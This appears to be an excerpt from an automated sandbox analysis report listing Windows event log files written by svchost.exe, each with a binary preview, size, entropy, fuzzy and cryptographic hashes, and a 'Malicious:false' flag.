                                              Preview:ElfChnk.>...............>............................K......................................................................Js$.................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................A...............&...i.......~......................**......>........Q.U..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.494827128412093
                                              Encrypted:false
                                              SSDEEP:384:phN7s7o787l7r787a7J7z7+7N17g797R7g7gY7hZ7D7k7F7r7wm7NP7Y7+7fa7lX:p9iuCg
                                              MD5:9BD7210AB6F4734F7C834E769EB05709
                                              SHA1:72B48470A94E9A1DA11ACCB81EE307E4051AC45D
                                              SHA-256:6D9C341BD38AAF6045073BB859F83AEC6FCB5290DAB2E1B6313E5B6CAA833BF3
                                              SHA-512:A4285CA3B031E9F8237B61C1BB71CB356674AE409A77FFB5C02571542EF9FF8B1FAEF8D7D8F6A65D1E51EFD8E64FF2C82FC5E6838FDC6CE89058793E5A9FB3D6
                                              Malicious:false
                                              Preview:ElfChnk.Y.......g.......Y.......g............%...&..Ve........................................................................_............................................=...........................................................................................................................f...............?...........................m...................M...F...........................................=...............&...............................................................s.......................**......Y........................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):2.1499045494600955
                                              Encrypted:false
                                              SSDEEP:384:Dhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauind:D6Ovc0S5UyEeDgLslstY
                                              MD5:2045FB0D54CA8F456B545859B9F9B0A8
                                              SHA1:35854F87588C367DE32A3931E01BC71535E3F400
                                              SHA-256:E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
                                              SHA-512:013CAC4CBF67C9AB5D2A07E771BAF81950E5A256F379E3C2E26CC9E8E47379579470CC6FD56E93B31C4D17935713D1FC6026307427D77CBE9647139E3D73AC47
                                              Malicious:false
                                              Preview:ElfChnk.........;...............;...........xk...m...+.....................................................................F.~.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................6f..w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.8164696340947971
                                              Encrypted:false
                                              SSDEEP:384:jhGuZumutu4uEu5uOuDuyb2uPu1uRu3uGuHu9/u:jr
                                              MD5:1AB19FA472669F4334C7A9D44E94E1B3
                                              SHA1:F71C16706CFA9930045C9A888FDB3EF46CACC5BC
                                              SHA-256:549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
                                              SHA-512:72F1F20CB1F2984B318E4A2AAEE11D573441A77D04C0577D24E19F89E85F1691CB29EF569BD25EBBBD313C7B9DB945DB43D52EEFC2EF33E7BEECDFB8E0BBC404
                                              Malicious:false
                                              Preview:ElfChnk...................................... ..x$../..........................................................................<................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................!..................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.9855903635327656
                                              Encrypted:false
                                              SSDEEP:384:cxNhPALAb/A0D6AKAlAfyVAQhAQueA4AIAwA0AYAwA+/AfAjrA3DA:cxN90yzXd
                                              MD5:7BCA54AC75C7185ADFBB42B1A84F86E3
                                              SHA1:AD91EE55A6F9F77AD871ACA9A5B59987CA679968
                                              SHA-256:A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
                                              SHA-512:79A04DCE951528E09F7580E797E38D58CFC556EFEC032C3E68C701D720E01CBDCA3D4F27C309D50B9096570787A0E62B2C69236D148AC9C216CB13AA05E9619F
                                              Malicious:false
                                              Preview:ElfChnk.....................................P+...,...0........................................................................9.................B.......................j...=...........................................................................................................................f...............?...........................m...................M...F...........................U.......................%%......&...................................................>...........................E.......**..............o.m...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):3.165454452307923
                                              Encrypted:false
                                              SSDEEP:384:ghVpIcpBUpBxpBapB3pBEpBZpBKpBV1pBApBppBTSpBcu1pBspBlpBABpB7pB0py:gd+uXvB
                                              MD5:B6B6F199DA64422984403D7374F32528
                                              SHA1:980D66401DFCCF96ADDDAF22334A5CE735554E7F
                                              SHA-256:8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
                                              SHA-512:5B0EFBF1C57BACF347790EB5915AFCFDDDDAFA7761D94DF1341C4E79F5B16DA3FAC2C9653C3DC41B80E31EA44AE46F4FC95C6EC0FFA0A0D3C05C69CED6955DE4
                                              Malicious:false
                                              Preview:ElfChnk.........'...............'...........P.......H:Z.....................................................................gO.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................f..................................**..............m.................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):3.8519554794255333
                                              Encrypted:false
                                              SSDEEP:384:WhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBZ:WwDoh1VqKVvcVU
                                              MD5:4140628CA3CEC29C0B506CEEBDF684F6
                                              SHA1:A2B70496C8E91D8E78AA04976B25D850ABAC6E1C
                                              SHA-256:1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
                                              SHA-512:779A04771A8E9B2F501FE1251F0D56C5B5988911F6067082D84FF1DBCF5D9281E32DF6CC2C995843EA1FCED748548DC116706E0F738B6510B47C2B3A0EBAA126
                                              Malicious:false
                                              Preview:ElfChnk.\...............\.......................0..../........................................................................v................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.1642919553794224
                                              Encrypted:false
                                              SSDEEP:384:bhwCCRzCaCkClCzCYC/CyCVCGCMCvCNCACCxC/CLCoiC:bKFb
                                              MD5:D7EECF043241FDB9486580582E208603
                                              SHA1:045D5672A8E9884B78CD31C52D372375503CBF4F
                                              SHA-256:6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
                                              SHA-512:6738CD1D4081AD78CCC1E3E7AC46A394D9AC32906B4688E34DCCBBA42153FB826484C854F42FFF619DC8D50CAE708585B422F3EAA3A0219AAD19DC0962910125
                                              Malicious:false
                                              Preview:ElfChnk.....................................02..h6...u'.....................................................................1..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................V2............................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):75320
                                              Entropy (8bit):4.574937524091996
                                              Encrypted:false
                                              SSDEEP:768:4dIZi8Ns5iLV8gRai8ZijiTEOmGkoeiDpb1w:t+Jao7mce8pG
                                              MD5:4CA0BD07B5AA9258855EB6B5B320602C
                                              SHA1:F097ACF6D2D13BF6DB04CF03CCC0C383C99C09CD
                                              SHA-256:2B52B97DF8BEB392C8D4079472140B420BD837CFEE3DC46AD85E04F02E88BA14
                                              SHA-512:7BB2DBE9C19B056F0F42A4908E278B236F737963E70FD493F63514F2AD2365D7D651AB389F1BBB03444EA1F0D1BB99D3EB6A9A447012AA14844766266C642104
                                              Malicious:false
                                              Preview:ElfChnk.........................................h ...L......................................................................'..-........................................4...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..0...........<................&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 15, DIRTY
                                              Category:dropped
                                              Size (bytes):79016
                                              Entropy (8bit):1.8192750395279649
                                              Encrypted:false
                                              SSDEEP:384:yRhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmNUmtUmxUmuvUm3hL6UsE0ZH:OY7LzpY7Lz
                                              MD5:AEEA2E768739E52A3B775E5375ED0734
                                              SHA1:3C13EEEEE744AD6DCA5F1493ABB8107082DF2F41
                                              SHA-256:51BFCBD35C709D15D89B3A00B8BF316787E0A8868B08196DB4B744AD7648BE15
                                              SHA-512:716FD25DEC45BF0216F5406C91487E6FCF6723BA48DDBA9629768447C955F594640419DC57DF1D04B90B8E3B2EF7648C9D13CAF43CB2C9F161F9EFEF675612A5
                                              Malicious:false
                                              Preview:ElfFile.....................................................................................................................\>.eElfChnk....................................../..(4...._.....................................................................E.Yp................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&..................................................................................../..................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.20426685429180536
                                              Encrypted:false
                                              SSDEEP:48:MhW4zIrP+MZQNRBEZWTENO4bpBkoh6/6FgVt:MzmKNVaO80oh6/6Fg
                                              MD5:A69F505BA6AF5B7207FEEE61C65FD393
                                              SHA1:D81DA234D75EE7EA2F0F3AA117ED520964B82B28
                                              SHA-256:6CF323F0D7C71CDB9068600915828E9319FC7FD4089514B3A9A90D2D85CEC0A7
                                              SHA-512:951F9DB216C57A800265B8BF03A15C075819C229422FCB549922FDCF616599D1E8A2E735F2D896D7F58077F028728680E81C7A7691A2E29F252DC5B43770DD7B
                                              Malicious:false
                                              Preview:ElfChnk.............................................y..@....................................................................AAx................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............................&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.6469884746870727
                                              Encrypted:false
                                              SSDEEP:384:/hpivNiGiriPiYiriDfiS83i0iGiTiYiUisiuiZi+iTiciUiQiJiUiBi4i/iAixQ:/G7t8H
                                              MD5:FC81D9FBA555C6BC7223594B8F6B46DE
                                              SHA1:971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C
                                              SHA-256:9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
                                              SHA-512:7F2705E7526B49F76C5F2A76A88B83FC10591BAD68B451F5C67F841322076D4B408FC515EA59E0919907C73CBBD149AB5B5EE981083A52C9E90EC9FBFAD5254F
                                              Malicious:false
                                              Preview:ElfChnk.y...............y................... Q..(S...b.......................................................................t..............................................=.......................#...................................................................................................f...............?.......................P.......................M...F...............................................................................................................VG..................................**......y..........:............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.3256209755036075
                                              Encrypted:false
                                              SSDEEP:768:S1a0NsamaCaCauauaua2apaNa1a9ajanadaga8aAarafa9agaMaVaGaCaKauayao:GNH
                                              MD5:02F6BB21537479BBF5B8855E7DB86BD9
                                              SHA1:EDA9E577E1306F882CE0B5156020C6FF134B7219
                                              SHA-256:B0D19213B0FCD06AA76305B81D1EEF1D3431998A201F65468781BBA0F8FD0863
                                              SHA-512:23771357B637873C391F6266B9A15DCEE2209B4476B75B9DF77C01A635DB560A9A3340FB8A3FD580D031476F76C719A2A239D348878616AB8AC7BD8B20B09A28
                                              Malicious:false
                                              Preview:ElfChnk......................................I...L.....t......................................................................>0................`...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................9...................................**..X.............>...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.3132453844344478
                                              Encrypted:false
                                              SSDEEP:384:hhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJnXJRXJtXJLXJjXJppXJ:hQ0yUkNYwD8imLE5nTtFpf
                                              MD5:6237EE0458A0478242B975E9BB7AA97D
                                              SHA1:6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1
                                              SHA-256:C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
                                              SHA-512:56C025C971F77AB8E911E0190E8AB5CF533A909C1BF4558876FB2761AAA381CB7D21E44A3273FA4427CB2FF7DEECC15A312DD2A424B96ABDC4886BDF233F30E9
                                              Malicious:false
                                              Preview:ElfChnk......................................<...A.........................................................................i,.q................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................<......C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.325262033408211
                                              Encrypted:false
                                              SSDEEP:384:6hYmn9moomUmKBmZOmZmlmmmomRmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfO:6/fGTDcx
                                              MD5:D13189B45679E53F5744A4D449F8B00F
                                              SHA1:ED410CAB42772E329F656B4793B46AC7159CF05B
                                              SHA-256:BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
                                              SHA-512:83399CE082F8C6D2917B8363E053C770F2783B3D086F39736919FBFA533DF65993A3B7840A2E1000B08948584CF9750C27961BF8A7BE3A235B5DDD779616013F
                                              Malicious:false
                                              Preview:ElfChnk.....................................h.................................................................................-.................X...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................1...........&.......................................................................................**..x...........~_g...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.7947046118743749
                                              Encrypted:false
                                              SSDEEP:384:jhr2zS2o202AW2D2t2l292l2V2p2d2N2:j8Q
                                              MD5:55E73A924B170FBFFF862E8E195E839A
                                              SHA1:3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0
                                              SHA-256:1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
                                              SHA-512:E14D32569F37A827EDBD1F02667866431C856D087A396933DE5E9B87943369C4802D220557050C7B0FE9367FBD0683676776E6D3CCBCB290C9F30D86EC529E28
                                              Malicious:false
                                              Preview:ElfChnk...................................... ..X"...........................................................................?.................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................3...........................&.......................................................................................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):68728
                                              Entropy (8bit):4.365914828585621
                                              Encrypted:false
                                              SSDEEP:384:EXl3R0RClRjRKXxhSRumRtRqR5RVR+rRvR3RFRXRmRbR+RLRlRFRDRiwhR3KR31u:8J8xA8nPLGbUK
                                              MD5:579EE360C5D4F58318ED5DB686344B95
                                              SHA1:1ECFF0A525B3B1DCD71B93EB536706FCBE55DD70
                                              SHA-256:B416B51838D8DA065388AE06184E2DFD9640460C9FD0C149B51F0396A4A3F4F5
                                              SHA-512:AEA4C7F4A348BC081A05C9B05C90A8DB1A84AFFBE590DB01127DB79FE15996667850999F111F0B6EEDE15CC305B428A74720C0ABC7EF9B5CDAD4014A91AECBF9
                                              Malicious:false
                                              Preview:ElfChnk.............................................jO.....................................................................um.......................y.......x..N...........=............................................y..................}y..3...........................................c......xb..f...h.......lc..?.......................h........c......M.......M...F...9c..............................................Qb..............................................A.......i.......................&............x..**..............+c..t..........x68................................................................<.......T...-.!................@+c..t...]P./..&I.....G..H...d........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l......Qb......*...................P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.......w.m.i.p.r.v.s.e...e.x.e...H...".%.P.r.o.g.r.a.m.D.a.t.a.%.\.M.i.c
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.273338343434408
                                              Encrypted:false
                                              SSDEEP:384:mhWhjhUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhC1:mBsFpkBjOFK
                                              MD5:C37372EB51AEDB4552CB839C7294403A
                                              SHA1:7B7C408D72B084CE36AA6B623AC6B907FD21D569
                                              SHA-256:C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
                                              SHA-512:69183719C29FCE5CEDB2634579ABA9FEF835A3CDC7668BB741F9DB36050756C088FD331E898DA8E4850887FD217B939DF1C5A3E7D73D2260CB3AC3570E71718E
                                              Malicious:false
                                              Preview:ElfChnk....................................................................................................................x...........................................8...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............i.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.231195890775603
                                              Encrypted:false
                                              SSDEEP:384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVt9VjViVyVKVui:Zyjbn
                                              MD5:3365A34953FD7B16667108A049B64DA5
                                              SHA1:C72421A58E063D64072152344B266F8306A78702
                                              SHA-256:AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
                                              SHA-512:A5569EDC7516DACCCE7B3135114588E01ED1A77CA95B0F378E389E27AC8999EA71E8AF36FD275EEA7E81987CB9BF14910645DE3DC4FE8E086FF532796DD78AAF
                                              Malicious:false
                                              Preview:ElfChnk.........!...............!............7..`8...j......................................................................@..#................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v....................................................3..................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.350749563754863
                                              Encrypted:false
                                              SSDEEP:384:Dh+BwB5BwBjBwBNSBwBYiBwB+BwBXBwBZabSqBwBlQBwBtfBwBvBwBPnBwBIrBw7:DOqabeGTnbuSxks
                                              MD5:9DC5DB60F60A68C4F33828D06C0EC11D
                                              SHA1:7D7EFFEA3CB508D3959F463669A2CF40EBB5C448
                                              SHA-256:62EF850AC3CB04DE306491E32E51EE82405BC671D103ABB8E27383EA48B9F35A
                                              SHA-512:38E88363CA8C830F16FAEBCAEB4D5514FADB3F9D4B4E411DE8A7B6514DCEF4D3C3E03FCF81E51EEAEBEF1209F4771DE32D2195B0BDB71830168645D23B93C04C
                                              Malicious:false
                                              Preview:ElfChnk.....................................H...x....4.y....................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F....................S......................................&...................................u...................................................**...............Dbf..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.421206160086997
                                              Encrypted:false
                                              SSDEEP:384:ah1qUEzUELUEnUEQUEpUE9UE4UEvUEqUEGUEuUEyUEpjUEmUE6UEVUE1UEdUEoUF:arN5mPfkvmR
                                              MD5:67CAD90771EBC0BD20736201D89C1586
                                              SHA1:EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7
                                              SHA-256:7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
                                              SHA-512:27DE77A98E11A1D33B648B9F46671F61338B1746032B4AD8F003A8A5C52FB7C3ECCB834057074EF5FCD3459A0810439BAF63E1320B385F7A5E81757A90BBFD13
                                              Malicious:false
